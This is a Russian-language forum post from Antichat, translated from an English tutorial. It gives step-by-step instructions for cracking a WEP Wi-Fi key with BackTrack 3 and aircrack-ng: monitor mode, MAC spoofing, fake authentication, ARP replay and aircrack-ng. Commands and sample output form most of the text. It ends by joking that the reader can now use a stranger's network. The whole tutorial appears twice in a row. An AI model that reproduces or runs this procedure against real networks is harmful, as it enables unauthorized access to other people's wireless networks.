jawbreaker
19.02.2009, 20:32
Для взлома WEP ключа нам понадобится:
- BactTrack 3
- подходящий wifi адаптер(список (http://aircrack-ng.org/doku.php?id=compatibility_drivers)).
- Точка доступа с WEP-шифрованием
- Базовое знание терминов (https://forum.antichat.ru/thread32521-wep.html)
.::Подготовка WIFI адаптера::.
Способ #1:
Набираем в консоли:iwconfig. В ответ будет что-то вроде:bt ~ # iwconfig
lo no wireless extensions.
wifi0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"homenet" Nickname:""
Mode:Managed Frequency:2.437 GHz Access Point: 00:17:9A:26:8C:0E
Bit Rate:18 Mb/s Tx-Power:15 dBm Sensitivity=1/1
Retryff RTS thrff Fragment thrff
Encryption key:1234-5678-99 Security modepen
Power Managementff
Link Quality=18/70 Signal level=-78 dBm Noise level=-96 dBm
Rx invalid nwid:5601 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Как видим, карточка находится в управляемом режиме -
чтобы взломать сеть нужно перевести её в режим мониторинга. Для этого пишем:wlanconfig ath1 create wlandev wifi0 wlanmode monitor
Всё, осталось сменить mac-адрес и можно переходить к следующему этапу, подставляя вместо [device] и [interface] ath1.
Способ #2:
iwconfig
Выдаст вам имя интерфейса беспроводного адаптера. Затем нужно остановить адаптер:
airmon-ng stop [device]
Затем:
ifconfig down [interface]
Теперь нужно поменять MAC адрес адаптера:
macchanger --mac 00:11:22:33:44:66 [device]
Настало время запустить адаптер в режиме мониторинга:
airmon-ng start [device]
http://thew0rd.com/wp-content/gallery/wepcrack/airmon-ngstart1.png
.::Атакуем цель::.
Ищем сеть с WEP шифрованием командой:
airodump-ng [device]
http://thew0rd.com/wp-content/gallery/wepcrack/airodumpwifi0.png
Запишите MAC адрес сети(BSSID) ключ которой хотите найти , канал (CH) и имя (ESSID). Теперь нужно начинать собирать данные с точки доступа сети для атаки:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]
http://thew0rd.com/wp-content/gallery/wepcrack/airodumpoutput.png
Эта команда выведет данные в файл network.out. Затем нужно скормить этот файл другой программе и золотой ключик наш ;) .
Откройте другую консоль (оставив эту работать). Теперь нужно сгенерить поддельные пакеты чтобы заставить точку доступа передавать больше данных необходимых для поиска ключа. Протестируйте точку доступа следующей командой:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
http://thew0rd.com/wp-content/gallery/wepcrack/aireplayfakeauth.png
Если всё прошло успешно можно начинать генерировать множество пакетов чтобы взломать WEP ключ:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
http://thew0rd.com/wp-content/gallery/wepcrack/aireplaygenerateivs.png
Это заставит точку доступа передать множество пакетов которые мы будем использовать для взлома ключа. Переключитесь на airodump-ng работающий в другой консоли и вы увидите как число "data" пакетов растет со временем.
http://thew0rd.com/wp-content/gallery/wepcrack/captureivs_0.png
После того как количество пакетов достигнет 10000-20000 (чем больше пакетов тем быстрее будет найден ключ) можно запускать aircrack.
Если не получается получить от точки доступа пакеты вышеописанным способом попробуйте ввести:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
http://thew0rd.com/wp-content/gallery/wepcrack/aireplayattack2p.png
Теперь, когда вы собрали достаточное количество пакетов для взлома можно приступать собственно к взлому:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
-n указывает на то что ключ 128ми битный (может быть 64 битным).
http://thew0rd.com/wp-content/gallery/wepcrack/crackng.png
Всё, ключ найден можно выходить в интернет с помощью чужой сети ;)
Источник (http://thew0rd.com/2008/08/19/tutorial-cracking-wep-using-backtrack-3/)
Переведено и дополнено jawbreaker специально для Античат.ру!
- BactTrack 3
- подходящий wifi адаптер(список (http://aircrack-ng.org/doku.php?id=compatibility_drivers)).
- Точка доступа с WEP-шифрованием
- Базовое знание терминов (https://forum.antichat.ru/thread32521-wep.html)
.::Подготовка WIFI адаптера::.
Способ #1:
Набираем в консоли:iwconfig. В ответ будет что-то вроде:bt ~ # iwconfig
lo no wireless extensions.
wifi0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"homenet" Nickname:""
Mode:Managed Frequency:2.437 GHz Access Point: 00:17:9A:26:8C:0E
Bit Rate:18 Mb/s Tx-Power:15 dBm Sensitivity=1/1
Retryff RTS thrff Fragment thrff
Encryption key:1234-5678-99 Security modepen
Power Managementff
Link Quality=18/70 Signal level=-78 dBm Noise level=-96 dBm
Rx invalid nwid:5601 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Как видим, карточка находится в управляемом режиме -
чтобы взломать сеть нужно перевести её в режим мониторинга. Для этого пишем:wlanconfig ath1 create wlandev wifi0 wlanmode monitor
Всё, осталось сменить mac-адрес и можно переходить к следующему этапу, подставляя вместо [device] и [interface] ath1.
Способ #2:
iwconfig
Выдаст вам имя интерфейса беспроводного адаптера. Затем нужно остановить адаптер:
airmon-ng stop [device]
Затем:
ifconfig down [interface]
Теперь нужно поменять MAC адрес адаптера:
macchanger --mac 00:11:22:33:44:66 [device]
Настало время запустить адаптер в режиме мониторинга:
airmon-ng start [device]
http://thew0rd.com/wp-content/gallery/wepcrack/airmon-ngstart1.png
.::Атакуем цель::.
Ищем сеть с WEP шифрованием командой:
airodump-ng [device]
http://thew0rd.com/wp-content/gallery/wepcrack/airodumpwifi0.png
Запишите MAC адрес сети(BSSID) ключ которой хотите найти , канал (CH) и имя (ESSID). Теперь нужно начинать собирать данные с точки доступа сети для атаки:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]
http://thew0rd.com/wp-content/gallery/wepcrack/airodumpoutput.png
Эта команда выведет данные в файл network.out. Затем нужно скормить этот файл другой программе и золотой ключик наш ;) .
Откройте другую консоль (оставив эту работать). Теперь нужно сгенерить поддельные пакеты чтобы заставить точку доступа передавать больше данных необходимых для поиска ключа. Протестируйте точку доступа следующей командой:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
http://thew0rd.com/wp-content/gallery/wepcrack/aireplayfakeauth.png
Если всё прошло успешно можно начинать генерировать множество пакетов чтобы взломать WEP ключ:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
http://thew0rd.com/wp-content/gallery/wepcrack/aireplaygenerateivs.png
Это заставит точку доступа передать множество пакетов которые мы будем использовать для взлома ключа. Переключитесь на airodump-ng работающий в другой консоли и вы увидите как число "data" пакетов растет со временем.
http://thew0rd.com/wp-content/gallery/wepcrack/captureivs_0.png
После того как количество пакетов достигнет 10000-20000 (чем больше пакетов тем быстрее будет найден ключ) можно запускать aircrack.
Если не получается получить от точки доступа пакеты вышеописанным способом попробуйте ввести:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
http://thew0rd.com/wp-content/gallery/wepcrack/aireplayattack2p.png
Теперь, когда вы собрали достаточное количество пакетов для взлома можно приступать собственно к взлому:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
-n указывает на то что ключ 128ми битный (может быть 64 битным).
http://thew0rd.com/wp-content/gallery/wepcrack/crackng.png
Всё, ключ найден можно выходить в интернет с помощью чужой сети ;)
Источник (http://thew0rd.com/2008/08/19/tutorial-cracking-wep-using-backtrack-3/)
Переведено и дополнено jawbreaker специально для Античат.ру!